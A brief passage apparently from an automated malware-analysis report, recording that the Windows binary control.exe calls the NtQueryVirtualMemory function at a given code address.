          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9730 NtQueryVirtualMemory,18_2_046F9730
          Source: C:\Windows\SysWOW64\control.exe